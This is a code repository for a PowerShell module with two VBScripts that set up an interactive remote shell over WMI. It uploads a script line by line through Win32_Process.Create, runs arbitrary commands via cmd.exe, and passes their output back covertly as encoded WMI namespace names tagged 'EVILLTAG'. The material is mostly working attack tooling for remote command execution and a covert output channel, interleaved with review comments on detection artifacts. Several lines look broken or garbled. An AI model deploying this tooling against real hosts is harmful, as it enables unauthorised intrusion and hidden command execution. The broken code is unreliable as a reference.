├── .gitattributes
├── Create-WMIshell.psm1
├── README.md
├── base64.vbs
└── hex.vbs
/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto

# Custom for Visual Studio
*.cs diff=csharp
*.sln merge=union
*.csproj merge=union
*.vbproj merge=union
*.fsproj merge=union
*.dbproj merge=union

# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain

--------------------------------------------------------------------------------
/Create-WMIshell.psm1:
--------------------------------------------------------------------------------
function New-WmiShell
{
<#
.SYNOPSIS
Setup interactive shell on a remote host leveraging the WMI service and a VBScript.

Author: Jesse Davis (@secabstraction)
License: BSD 3-Clause
Required Dependencies: Base64/Hex encoding VBScript(s)

.DESCRIPTION
New-WmiShell tests connectivity with the WMI service and uploads a VBScript to the remote host(s). The uploaded
VBScript will receive and execute shell commands via the WMI service and process the output of those commands.

How the upload works (relevant when reviewing host telemetry): the script is written one line at a time by
spawning "cmd.exe /c echo <line> >> <UploadTo>\<random>.vbs" on the remote host through Win32_Process.Create,
so a host with process-creation auditing records one cmd.exe launch per line of the VBScript, followed by a
cscript.exe launch that runs the uploaded script with "whoami /priv". Command output is exchanged through
namespace names under root\default (prefix "EVILLTAG", marker "OUTPUT_READY"), see Get-WmiShellOutput.

.PARAMETER ComputerName
One or more host names to set up. Accepted from the pipeline, by value or by property name.

.PARAMETER UserName
PSCredential used for every WMI call against the remote host(s). Defaults to the Empty credential, in which
case Get-Credential prompts for one in the BEGIN block. The resulting credential object is stored on each
session object and therefore in $Global:WmiShells for the rest of the PowerShell session.

.PARAMETER UploadTo
Directory on the remote host into which the VBScript is written (for example %TEMP%). Recorded on the
session object as vbsLocation.

.PARAMETER Encoding
"Base64" or "Hex". Selects which VBScript (.\base64.vbs or .\hex.vbs, read from the current directory) is
uploaded, and how Get-WmiShellOutput decodes the command output afterwards.

.EXAMPLE
PS C:\> New-WmiShell -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64

.INPUTS
System.String[] — ComputerName, from the pipeline.

.OUTPUTS
Nothing is written to the pipeline. Session objects for hosts that answered are stored in $Global:WmiShells;
status lines and the decoded "whoami /priv" output go to the host via Write-Host.

.LINK
#>

    [CmdLetBinding()]

    Param (
        [Parameter(Mandatory = $True,
                   ValueFromPipeline = $True,
                   ValueFromPipelineByPropertyName = $True)]
        [string[]]$ComputerName,
        [Parameter()]
        [ValidateNotNull()]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty,
        [Parameter(Mandatory = $True)]
        [string]$UploadTo,
        [Parameter(Mandatory = $True)]
        [ValidateSet("Base64", "Hex")]
        [string]$Encoding
    ) #End Param

    BEGIN
    {

        # Store credentials for use on remote host(s). Get-Credential prompts interactively when $UserName
        # is the Empty credential (the default); $creds is copied onto every session object below.
        $creds = Get-Credential -Credential $UserName

        # Read VBScript into [] — one element per line. The path is relative to the *current directory*,
        # not to the module's location, so the module must be imported from the directory holding the two
        # .vbs files (see README). $vbscript and $vbScript are the same variable (names are case-insensitive).
        if ($Encoding -eq "Base64") { $vbscript = gc -Encoding UTF8 .\base64.vbs }

        else { $vbScript = gc -Encoding UTF8 .\hex.vbs }
    }

    PROCESS
    {
        $wmiOn = @()   # session objects for hosts treated as reachable
        $wmiOff = @()  # input names treated as unreachable

        foreach ($name in $ComputerName)
        {
            # Generate random name for VBScript (".vbs" is appended to the 8.3-style name GetRandomFileName returns)
            $vbsName = [System.IO.Path]::GetRandomFileName() + ".vbs"

            # Grab some data about the host, validation of WMI accessibility.
            # These are the first remote calls; a connection failure here is reported by Get-WmiObject as an
            # error and leaves $os/$comp empty rather than aborting the loop (presumably — default ErrorAction).
            $os = Get-WmiObject -ComputerName $name -Credential $creds -Class Win32_OperatingSystem
            $comp = Get-WmiObject -ComputerName $name -Credential $creds -Class Win32_ComputerSystem
            #$env = Get-WmiObject -Credential $creds -Class Win32_Environment -ComputerName $computer

            # Session object: host inventory from the two WMI classes plus everything later functions need to
            # reach the uploaded script again (credential, file name, upload directory, encoding).
            $props = @{
                'HostName' = $os.CSName;
                'Maufacturer' = $comp.Manufacturer;
                'Model' = $comp.Model;
                'OS' = $os.Caption;
                'OSVersion' = $os.Version;
                'ServicePack' = $os.ServicePackMajorVerison;
                'Workgroup' = $comp.Workgroup;
                'PartOfDomain' = $comp.PartOfDomain;
                'Domain' = $comp.Domain;
                'OSArchitecture' = $os.OSArchitecture;
                'SystemType' = $comp.SystemType;
                'DEP_32BitApps' = $os.DataExecutionPrevention_32BitApplications;
                'DEP_Available' = $os.DataExecutionPrevention_Available;
                'DEP_Drivers' = $os.DataExecutionPrevention_Drivers;
                'SystemDrive' = $os.SystemDrive;
                'TotalPhysicalMemory' = $comp.TotalPhysicalMemory;
                'Credentials' = $creds;
                'vbsName' = $vbsName;
                'vbsLocation' = $UploadTo;
                'Encoding' = $Encoding;
                # NOTE(review): this is the whole $ComputerName parameter, not the current $name, so with an
                # array argument every session object carries the full input list.
                'ComputerName' = $ComputerName;
            }
            $obj = New-Object -TypeName PSObject -Property $props

            # NOTE(review): the accessibility test inspects the ComputerName value copied from the input
            # parameter rather than whether $os/$comp were actually retrieved, so the "not accessible"
            # branch is only reached when the input itself is empty.
            if ($obj.ComputerName) {
                Write-Host -ForegroundColor Green "+ WMI is accessible on $($obj.ComputerName) +"
                $wmiOn += $obj
            }
            else {
                Write-Host -ForegroundColor Yellow "- WMI is not accessible on $($ComputerName) -"
                $wmiOff += $ComputerName
            }
        }

        foreach ($computer in $wmiOn) {

            # Upload VBScript to Host: one Win32_Process.Create per line of the script. The line text is
            # interpolated unquoted into a cmd.exe command line, so cmd's own parsing applies to it before
            # the text reaches the file.
            foreach ($line in $vbScript) {

                $argList = "cmd.exe /c echo $($line) >> $($computer.vbsLocation)\$($computer.vbsName)"
                Invoke-WmiMethod -ComputerName $computer.ComputerName -Credential $computer.Credentials -Class win32_process -Name create -ArgumentList $argList | Out-Null

                # Status-bar (ReadCount is the 1-based line number Get-Content attached to $line)
                Write-Progress -Status "Please Wait..." -Activity "Uploading VBScript: $($computer.vbsName) to: $($computer.HostName) in $($UploadTo)" -PercentComplete (($line.ReadCount / $vbScript.Length) * 100)
            }

            # Validate functionality: run the uploaded script once with "whoami /priv" as its single argument.
            $cScript = "cmd.exe /c cscript.exe $($computer.vbsLocation)\$($computer.vbsName) `"whoami /priv`""
            Invoke-WmiMethod -ComputerName $computer.ComputerName -Credential $computer.Credentials -Class win32_process -Name create -ArgumentList $cScript | Out-Null

            # Wait for vbScrpit to finish writing output to WMI namespaces.
            # Busy-polls (no delay) root\default for a namespace named OUTPUT_READY, which the VBScript creates
            # once it has stored the command output. NOTE(review): unlike every other WMI call in this
            # function, this query passes neither -ComputerName nor -Credential.
            $outputReady = ""
            do{$outputReady = Get-WmiObject -Namespace root\default -Query "SELECT Name FROM __Namespace WHERE Name like 'OUTPUT_READY'"}
            until($outputReady)

            Get-WmiShellOutput -UserName $computer.Credentials -ComputerName $computer.ComputerName -Encoding $computer.Encoding
        }
    }

    END {
        Write-Host -ForegroundColor Green "WMI Shells successfully setup on $($wmiOn.Length) host(s)"
        Write-Host -ForegroundColor Yellow "WMI Shells failed on $($wmiOff.Length) host(s)"
        # Session objects (credential included) are kept in a global for List-/Enter-/Close-WmiShell.
        # Note that this assignment replaces, not extends, the sessions from an earlier New-WmiShell call.
        $Global:WmiShells = $wmiOn
    }
}
Export-ModuleMember New-WmiShell

function List-WmiShells
{
    # Prints one "Session N = <host>" line per object in $Global:WmiShells (populated by New-WmiShell).
    #[CmdLetBinding()]

    foreach($entry in $Global:WmiShells) {
        # NOTE(review): the session objects built in New-WmiShell have no ReadCount property, so this test
        # appears to always fall through to the "Session 0" line (README lists a better implementation as a TODO).
        If ([BOOL]$entry.ReadCount) {
            Write-Host -ForegroundColor Cyan "Session $($entry.ReadCount) = $($entry.ComputerName)"
        }
        else {Write-Host -ForegroundColor Cyan "Session 0 = $($entry.ComputerName)"}
    }
}
Export-ModuleMember List-WmiShells

function Get-WmiShellOutput
{
<#
.SYNOPSIS
Retrieves Base64 encdoded data from WMI namespaces.

Author: Jesse Davis (@secabstraction)
License: BSD 3-Clause
Required Dependencies: Base64/Hex encoding VBScript(s)

.DESCRIPTION
Get-WmiShellOutput queries WMI for namespaces containing Base64 encdoded data that has been tagged for retrieval,
retrieves the data, decodes it, and writes the decoded output to the console.

The data channel is the *name* of namespaces under root\default on the remote host: the uploaded VBScript
stores each chunk of command output as a namespace named "EVILLTAG" + six-digit sequence number + encoded
chunk, and these names persist until the script is next run (it deletes them on every invocation and on
"exit"). Anything that enumerates __Namespace under root\default therefore sees the last command's output.

.PARAMETER ComputerName
Host whose root\default namespace is queried. Accepted from the pipeline.

.PARAMETER UserName
PSCredential for the WMI query. Defaults to the Empty credential.

.PARAMETER UploadTo
Not a parameter of this function (listed here by the author for symmetry with New-WmiShell); the Param block
below declares only ComputerName, UserName and Encoding.

.PARAMETER Encoding
"Base64" or "Hex"; must match the VBScript that produced the namespaces, since it selects the decoder.

.EXAMPLE
PS C:\> Get-WmiShellOutput -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64

.INPUTS
System.String[] — ComputerName, from the pipeline.

.OUTPUTS
Nothing to the pipeline; decoded text is written with Write-Host.

.LINK
#>

    [CmdLetBinding()]

    Param (
        [Parameter(Mandatory = $True,
                   ValueFromPipeline = $True,
                   ValueFromPipelineByPropertyName = $True)]
        [string[]]$ComputerName,
        [Parameter(ValueFromPipeline = $True,
                   ValueFromPipelineByPropertyName = $True)]
        [ValidateNotNull()]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty,
        [Parameter(Mandatory = $True,
                   ValueFromPipeline = $True,
                   ValueFromPipelineByPropertyName = $True)]
        [ValidateSet("Base64", "Hex")]
        [string]$Encoding
    ) #End Param

    # Every chunk is the Name of a namespace beginning with the fixed tag "EVILLTAG" (see insertPiece in
    # base64.vbs / hex.vbs). Ordering comes from the zero-padded sequence number that follows the tag,
    # which is why the names are sorted before being decoded and concatenated.
    $getOutput = @()
    $getOutput = Get-WmiObject -Credential $UserName -ComputerName $ComputerName -Namespace root\default -Query "SELECT Name FROM __Namespace WHERE Name like 'EVILLTAG%'" | Select-Object Name

    # NOTE(review): when the query returns nothing, $getOutput is $null and the single-line branches below
    # call .Remove on an empty Name; with exactly one result the Length test depends on the PowerShell
    # version (v3+ reports Length 1 for a scalar object) — TODO confirm which branch is reached in practice.
    if ([BOOL]$getOutput.Length) {

        #Read string objects into array, then sort them
        $getStrings = for ($i = 0; $i -lt $getOutput.Length; $i++) { $getOutput[$i].Name }
        $sortStrings = $getStrings | Sort-Object

        if ($Encoding -eq "Base64") {

            #Decode Base64 output
            foreach ($line in $sortStrings) {

                # Replace non-base64 characters. The 14 characters removed are the tag ("EVILLTAG" + 6 digits);
                # the substitutions undo the '+' and '/' replacements base64.vbs makes before creating the
                # namespace. NOTE(review): the replacement literals on this page look mojibake'd ("`“", "Ã")
                # next to the 'Ó' that base64.vbs writes — confirm against the original file's encoding.
                $cleanString = $line.Remove(0, 14) -replace "`“", "+" -replace "Ã", "" -replace "_", "/"

                #Add necessary base64 padding characters — the VBScript encoder emits no '=' padding at all.
                if ($cleanString.Length % 4 -ne 0) { $cleanString += ("===").Substring(0, 4 - ($cleanString.Length % 4)) }

                # Decode base64 string and remove front side spaces (the padding parseCmdOutput adds to each
                # piece; 8 characters per side according to the Remove calls here). NOTE(review): the encoder
                # side uses Asc(), so non-ASCII output may not round-trip through UTF8.GetString.
                $decodeString = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cleanString)).Remove(0, 8))

                # Remove back side spaces and compile output
                $decodedOutput += $decodeString.Remove(($decodeString.Length - 8), 8)
            }
            Write-Host $decodedOutput
        }
        else {

            #Decode Hex output
            foreach ($line in $sortStrings) {

                # 15 characters: the 14-character tag plus the leading "_" hexEn puts before every byte.
                # NOTE(review): "Reomve" is not a String method as spelled, and the Split argument uses
                # typographic quotes on this page — confirm against the original file.
                $cleanString = $line.Reomve(0, 15)
                $cleanString.Split(“_“) | foreach { Write-Host -object ([CHAR][BYTE]([CONVERT]::toint16($_, 16))) -NoNewline }
            }
        }

    }
    else {
        #Decode single line Base64 (same tag strip / substitutions / padding as the multi-line branch above)
        # NOTE(review): the closing brace at the end of the $decodedOutput line closes this `if`, which leaves
        # the `else` a few lines down without a matching `if`; the indentation suggests the brace was meant to
        # follow the Write-Host — confirm against the original file.
        if($Encoding -eq "Base64") {
            $getStrings = $getOutput.Name
            $cleanString = $getStrings.Remove(0, 14) -replace "`“", "+" -replace "Ã", "" -replace "_", "/"
            if ($cleanString.Length % 4 -ne 0) { $cleanString += ("===").Substring(0, 4 - ($cleanString.Length % 4)) }
            $decodedOutput = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cleanString)) }
            Write-Host $decodedOutput.Remove(0, 8)
        }
        #Decode single line Hex
        else {
            $getStrings = $getOutput.Name
            $cleanstring = $getStrings.Remove(0,15)
            $cleanString.Split(“_“) | foreach { Write-Host -object ([CHAR][BYTE]([CONVERT]::toint16($_, 16))) -NoNewline }
        }
}
Export-ModuleMember Get-WmiShellOutput

function Enter-WmiShell
{
<#
.SYNOPSIS
Enter interactive WMI pseudo remote-shell.

Author: Jesse Davis (@secabstraction)
License: BSD 3-Clause
Required Dependencies: New-WmiShell, Get-WmiShellOutput

.DESCRIPTION
Enter-WmiShell provides a cmd-prompt to interact with a remote-computer.

Each line typed at the prompt is sent to the remote host as
    cmd.exe /c cscript.exe <UploadTo>\<vbsName> "<line>"
through Win32_Process.Create; the uploaded VBScript runs it and publishes the output as namespaces under
root\default, which Get-WmiShellOutput then reads. Two inputs are special: "retry" re-reads the currently
stored output without running anything, and "exit" is still sent to the script (it performs the namespace
cleanup) but no output is collected and the loop ends.

.PARAMETER Session
Index into $Global:WmiShells (parameter set "set1"). All connection details are taken from that session object.

.PARAMETER ComputerName
Host to talk to when no -Session is given ("set2"). Accepted from the pipeline.

.PARAMETER UserName
PSCredential for the WMI calls ("set2"). Defaults to the Empty credential.

.PARAMETER UploadTo
Directory on the remote host holding the uploaded VBScript ("set2").

.PARAMETER vbsName
File name of the uploaded VBScript ("set2"); declared in the Param block below although not in the original help.

.PARAMETER Encoding
Not declared in the Param block: it is only populated from the session object when -Session is used, so in
"set2" Get-WmiShellOutput is called with an empty -Encoding — TODO confirm intended behaviour.

.EXAMPLE
PS C:\> Enter-WmiShell -Session 0

.EXAMPLE
PS C:\> Enter-WmiShell -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64

.INPUTS
System.String[] — ComputerName, from the pipeline.

.OUTPUTS
Nothing to the pipeline; the prompt and decoded output are written with Write-Host.

.LINK
#>

    [CmdLetBinding(DefaultParameterSetName = "set1")]

    Param (
        [Parameter(ParameterSetName = "set1")]
        [string]$Session,
        [Parameter(ParameterSetName = "set2",
                   Mandatory = $True,
                   ValueFromPipeline = $True,
                   ValueFromPipelineByPropertyName = $True)]
        [string[]]$ComputerName,
        [Parameter(ParameterSetName = "set2")]
        [ValidateNotNull()]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty,
        [Parameter(ParameterSetName = "set2", Mandatory = $True)]
        [string]$UploadTo,
        [Parameter(ParameterSetName = "set2", Mandatory = $True)]
        [string]$vbsName
    ) #End Param

    # Resolve every connection detail from the session object New-WmiShell stored in $Global:WmiShells.
    # $Session is a [string] and is used directly as the array index.
    if ($PSBoundParameters['Session']) {
        $ComputerName = $Global:Wmishells[$Session].ComputerName
        $UserName = $Global:WmiShells[$Session].Credentials
        $UploadTo = $Global:WmiShells[$Session].vbsLocation
        $vbsName = $Global:WmiShells[$Session].vbsName
        $Encoding = $Global:Wmishells[$Session].Encoding
    }

    do{
        # Make a pretty prompt for the user to provide commands at
        Write-Host ("[" + $($ComputerName) + "]: WmiShell>") -nonewline -foregroundcolor green -backgroundcolor black
        $command = Read-Host

        # "retry" only re-reads whatever the remote namespaces currently hold.
        if ($command -eq "retry") { Get-WmiShellOutput -UserName $UserName -ComputerName $ComputerName -Encoding $Encoding }

        else {

            # Execute commands on remote host using cscript.exe and uploaded VBScript.
            # The typed text is placed inside double quotes on the cscript command line and reaches the
            # remote host unmodified; the VBScript hands it to %comspec% /c.
            $cScript = "cmd.exe /c cscript.exe $($UploadTo)\$($vbsName) `"$($command)`""
            Invoke-WmiMethod -ComputerName $ComputerName -Credential $UserName -Class win32_process -Name create -ArgumentList $cScript | Out-Null
            Start-Sleep -s 1

            # "exit" was still sent above (the script deletes its namespaces on that argument); nothing is read back for it.
            if ($command -ne "exit") {

                # Wait for vbScrpit to finish writing output to WMI namespaces — busy-poll with no delay,
                # and (as in New-WmiShell) issued without -ComputerName/-Credential.
                $outputReady = ""
                do{$outputReady = Get-WmiObject -Namespace root\default -Query "SELECT Name FROM __Namespace WHERE Name like 'OUTPUT_READY'"}
                until($outputReady)

                # Retrieve cmd output written to WMI namespaces
                Get-WmiShellOutput -UserName $UserName -ComputerName $ComputerName -Encoding $Encoding
            }
        }
    }until($command -eq "exit")
}
Export-ModuleMember Enter-WmiShell

function Close-WmiShell
{
<#
.SYNOPSIS
Cleans up WMI shell artifacts.

Author: Jesse Davis (@secabstraction)
License: BSD 3-Clause
Required Dependencies:

.DESCRIPTION
Close-WmiShell removes the VBScript(s) and any namespaces that have been written to by the WmiShell scripts.

NOTE(review): as written, the body only issues "cmd.exe /c del <UploadTo>\<vbsName>" for the script file.
The EVILLTAG* / OUTPUT_READY namespaces are deleted by the VBScript itself when it is run with "exit"
(see Enter-WmiShell), not here — so a shell that was never exited leaves its last output in root\default
after Close-WmiShell has run. The deletion is attempted once, without checking the Invoke-WmiMethod result.

.PARAMETER Session
Index into $Global:WmiShells ("set1"); must be all digits. Connection details come from that session object.

.PARAMETER All
Delete the uploaded script of every session in $Global:WmiShells ("set2").

.PARAMETER ComputerName
Host to clean up when neither -Session nor -All is given ("set3"). Accepted from the pipeline.

.PARAMETER UserName
PSCredential for the WMI call ("set3"). Defaults to the Empty credential.

.PARAMETER UploadTo
Directory on the remote host holding the uploaded VBScript ("set3").

.PARAMETER Encoding
Not a parameter of this function; the Param block declares vbsName (the file to delete) instead.

.EXAMPLE
PS C:\> Close-WmiShell -Session 0

.EXAMPLE
PS C:\> Close-WmiShell -All

.EXAMPLE
PS C:\> Close-WmiShell -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64

.INPUTS
System.String[] — ComputerName, from the pipeline.

.OUTPUTS
None.

.LINK
#>

    [CmdLetBinding(DefaultParameterSetName = "set1")]

    Param (
        [Parameter(ParameterSetName = "set1")]
        [ValidatePattern('^\d+$')]
        [string]$Session,
        [Parameter(ParameterSetName = "set2")]
        [Switch]$All,
        [Parameter(ParameterSetName = "set3",
                   Mandatory = $True,
                   ValueFromPipeline = $True,
                   ValueFromPipelineByPropertyName = $True)]
        [string[]]$ComputerName,
        [Parameter(ParameterSetName = "set3")]
        [ValidateNotNull()]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty,
        [Parameter(ParameterSetName = "set3", Mandatory = $True)]
        [string]$UploadTo,
        [Parameter(ParameterSetName = "set3", Mandatory = $True)]
        [string]$vbsName
    ) #End Param

    if ($PSBoundParameters['Session']) {
        # Same session lookup as Enter-WmiShell.
        $ComputerName = $Global:Wmishells[$Session].ComputerName
        $UserName = $Global:WmiShells[$Session].Credentials
        $UploadTo = $Global:WmiShells[$Session].vbsLocation
        $vbsName = $Global:WmiShells[$Session].vbsName
        $Encoding = $Global:Wmishells[$Session].Encoding
    }
    elseif ($All) {
        foreach ($obj in $Global:Wmishells) {
            $cScript = "cmd.exe /c del $($obj.vbsLocation)\$($obj.vbsName)"
            Invoke-WmiMethod -ComputerName $obj.ComputerName -Credential $obj.Credentials -Class win32_process -Name create -ArgumentList $cScript | Out-Null
        }
        # NOTE(review): no return here, so after the -All loop control falls through to the single
        # deletion below with $ComputerName/$UploadTo/$vbsName unset.
    }

    $cScript = "cmd.exe /c del $($UploadTo)\$($vbsName)"
    Invoke-WmiMethod -ComputerName $ComputerName -Credential $UserName -Class win32_process -Name create -ArgumentList $cScript | Out-Null
}
Export-ModuleMember Close-WmiShell

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Getting Started
===============
1. Navigate to the directory containing Create-WmiShell.psm1 and the 2 VB scripts
2. Import-Module .\Create-WmiShell.psm1
3. New-WmiShell -ComputerName -UserName -UploadTo -Encoding
4. List-WmiShells
5. Enter-WmiShell -Session <# from List-WmiShells>

When creating a new wmishell, you can start powershell with the runas.exe command and skip the -UserName parameter.

TODOs
===============
1. Test functionality against (multiple) target host file
2. Better implementation of List-WmiShells function
3.
Test Close-WmiShell function

--------------------------------------------------------------------------------
/base64.vbs:
--------------------------------------------------------------------------------
' Remote-side half of the WmiShell module (Base64 variant). Uploaded by New-WmiShell and run as
'   cscript.exe <this file> "<command>"
' Artifacts it leaves on the host while in use: the script file itself, a cmd.exe (%comspec%) launch per
' command, one wmic.exe launch per output chunk, and namespaces under root\default named
' "EVILLTAG" + six-digit sequence number + encoded chunk, plus a marker namespace "OUTPUT_READY".

' Minimal Base64 encoder. It deviates from standard Base64 in one way the PowerShell decoder relies on:
' it never emits '=' padding — the last one or two output characters are simply omitted when w2/w3 are 0.
' Because prepare() returns 0 both past the end of the string and for a Chr(0) character, an embedded
' NUL is treated the same as end of input.
Function encode(byVal strIn)
    Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    Dim w1, w2, w3, i, totalLen, strOut
    totalLen = Len(strIn)
    ' Round the length up to a multiple of 3 so the loop always reads a full triple; Mid() past the end
    ' returns "" and prepare() maps that to 0.
    If Not ((totalLen Mod 3) = 0) Then totalLen = totalLen + 3 - (totalLen Mod 3)
    For i = 1 To totalLen Step 3
        w1 = prepare( Mid( strIn, i, 1 ) )
        w2 = prepare( Mid( strIn, i + 1, 1 ) )
        w3 = prepare( Mid( strIn, i + 2, 1 ) )
        ' Standard 3-byte -> 4-sextet split done with integer division instead of shifts.
        strOut = strOut + Mid( Base64Chars, ( Int( w1 / 4 ) And 63 ) + 1 , 1 )
        strOut = strOut + Mid( Base64Chars, ( ( w1 * 16 + Int( w2 / 16 ) ) And 63 ) + 1, 1 )
        If (w2 Or w3) Then
            strOut = strOut + Mid( Base64Chars, ( ( w2 * 4 + Int( w3 / 64 ) ) And 63 ) + 1, 1 )
            If w3 Then
                strOut = strOut + Mid( Base64Chars, (w3 And 63 ) + 1, 1)
            End If
        End If
    Next
    encode = strOut
End Function

' Character -> byte value for encode(): 0 for an empty string, otherwise Asc() (the ANSI code, one byte
' per character — multi-byte/Unicode text is not represented as UTF-8 here).
Function prepare( byVal strIn )
    If Len( strIn ) = 0 Then
        prepare = 0 : Exit Function
    Else
        prepare = Asc(strIn)
    End If
End Function

' Splits the captured command output into pieceLen-character pieces, pads each piece with spaces on both
' sides (the PowerShell decoder strips that padding again) and stores every piece through insertPiece with
' a 1-based sequence number. The remainder — possibly empty — is always stored as piece nbOfPieces+1.
' Declared as a Function but assigns no return value.
Function parseCmdOutput(cmdOutput)
    strLen = Len(cmdOutput)
    pieceLen = 5500
    nbOfPieces = Int(strLen/pieceLen)
    For i = 1 to nbOfPieces
        piece = Left(cmdOutput,pieceLen)
        piece = " " + piece + " "
        cmdOutput = Mid(cmdOutput,pieceLen+1)
        insertPiece i,piece
    Next
    cmdOutput = " " + cmdOutput + " "
    insertPiece nbOfPieces+1,cmdOutput
End Function

' Publishes one piece as a namespace under root\default. The name is a fixed 14-character tag
' ("EVILLTAG" + number zero-padded to 6 digits — so the decoder's Remove(0, 14)) followed by the Base64
' text, with '+' and '/' substituted — presumably because they are not acceptable inside the quoted
' wmic Name= value; the PowerShell side reverses both substitutions. Exec() is asynchronous; the 50 ms
' sleep is the only pacing between consecutive wmic launches.
Function insertPiece(ByVal number,ByVal piece)
    count = CStr(number)
    zeros = String(6 - Len(count), "0")
    tag = "EVILLTAG" + zeros + count
    piece = encode(piece)
    piece = Replace(piece,"+","Ó")
    piece = Replace(piece,"/","_")
    piece = tag + piece
    Set aShell = CreateObject("WScript.Shell")
    aShell.Exec("wmic /NAMESPACE:\\root\default PATH __Namespace CREATE Name='" + piece + "'")
    WScript.Sleep 50
End Function

' Entry point. The single argument is either the literal "exit" (cleanup only) or a command line.
Set myShell = CreateObject("WScript.Shell")
tmpDir = myShell.ExpandEnvironmentStrings("%TEMP%")   ' assigned but not referenced anywhere else in this file
Select Case WScript.Arguments.Item(0)
    Case "exit"
        ' Cleanup: remove the OUTPUT_READY marker and every EVILLTAG* namespace left under root\default.
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete")
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete")
    Case Else
        ' Same cleanup first so stale output from the previous command is not re-read (note Exec does not
        ' wait for these deletions to finish), then run the argument through %comspec% /c. Only StdOut is
        ' captured — anything the command writes to StdErr never reaches the caller.
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete")
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete")
        set cmdExecution = myShell.exec("%comspec% /c " + WScript.Arguments.Item(0))
        cmdOutput = cmdExecution.StdOut.ReadAll
        parseCmdOutput cmdOutput
        ' Marker namespace the PowerShell side polls for before reading the EVILLTAG* namespaces.
        myShell.Exec("wmic /NAMESPACE:\\root\default PATH __Namespace CREATE Name='OUTPUT_READY'")
End Select

--------------------------------------------------------------------------------
/hex.vbs:
--------------------------------------------------------------------------------
' Hex variant of base64.vbs: identical control flow and host-side artifacts (script file, cmd.exe and
' wmic.exe launches, EVILLTAG*/OUTPUT_READY namespaces under root\default); only the chunk size and the
' encoding of each chunk differ.

' Encodes every character as "_" + Hex(Asc(ch)) — no zero-padding, so a byte below 16 yields one hex digit.
' The string therefore always starts with "_" (hence the decoder's Remove(0, 15): 14-character tag + "_")
' and the decoder splits on "_" and parses each field with base 16.
function hexEn(str)
    dim strEncoded, i
    strEncoded = ""
    for i = 1 to Len(str)
        strEncoded = strEncoded + "_" + Hex(Asc(Mid(str, i, 1)))
    next
    hexEn = strEncoded
End function

' Same splitting as base64.vbs but with 2500-character pieces (hex encoding roughly triples the length).
' Declared as a Function but assigns no return value.
Function parseCmdOutput(cmdOutput)
    strLen = Len(cmdOutput)
    pieceLen = 2500
    nbOfPieces = Int(strLen/pieceLen)
    For i = 1 to nbOfPieces
        piece = Left(cmdOutput,pieceLen)
        piece = " " + piece + " "
        cmdOutput = Mid(cmdOutput,pieceLen+1)
        insertPiece i,piece
    Next
    cmdOutput = " " + cmdOutput + " "
    insertPiece nbOfPieces+1,cmdOutput
End Function

' Publishes one piece as a namespace named "EVILLTAG" + 6-digit sequence number + hex text. No character
' substitution is needed here because the hex alphabet and "_" are safe in the wmic Name= value.
' Exec() is asynchronous; the 50 ms sleep is the only pacing between wmic launches.
function insertPiece(ByVal number,ByVal piece)
    count = CStr(number)
    zeros = String(6 - Len(count), "0")
    tag = "EVILLTAG" + zeros + count
    piece = hexEn(piece)
    piece = tag + piece
    Set aShell = CreateObject("WScript.Shell")
    aShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace CREATE Name='" + piece + "'")
    WScript.Sleep 50
End function

' Entry point: "exit" performs cleanup only; any other argument is run via %comspec% /c and its StdOut
' (StdErr is not captured) is published through parseCmdOutput, followed by the OUTPUT_READY marker.
Set myShell = CreateObject("WScript.Shell")
tmpDir = myShell.ExpandEnvironmentStrings("%TEMP%")   ' assigned but not referenced anywhere else in this file
Select Case WScript.Arguments.Item(0)
    Case "exit"
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete")
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete")
    Case Else
        ' Clear the previous command's namespaces first (Exec does not wait for the deletions to complete).
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete")
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete")
        set cmdExecution = myShell.exec("%comspec% /c " + WScript.Arguments.Item(0))
        cmdOutput = cmdExecution.StdOut.ReadAll
        parseCmdOutput cmdOutput
        myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace CREATE Name='OUTPUT_READY'")
End Select
--------------------------------------------------------------------------------